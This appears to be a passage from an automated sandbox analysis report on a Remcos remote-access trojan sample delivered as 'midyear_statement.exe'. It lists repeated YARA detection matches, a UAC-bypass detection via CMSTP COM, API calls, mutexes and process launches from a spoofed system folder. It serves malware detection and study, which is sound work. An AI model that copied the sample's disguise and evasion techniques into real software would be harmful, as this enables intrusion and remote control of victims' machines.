                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,27_2_004182CE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12347952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,24_2_12347952
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A7F18 GetDiskFreeSpaceA,0_2_040A7F18
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,24_2_1233F474
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B6D0C CoCreateInstance,0_2_040B6D0C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,24_2_1234B4A8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,24_2_1234AA4A
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Users\Public\Libraries\NullJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifMutant created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1Jump to behavior
                      Source: C:\Windows \System32\2506803.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCommand line argument: PG24_2_0059F7A7
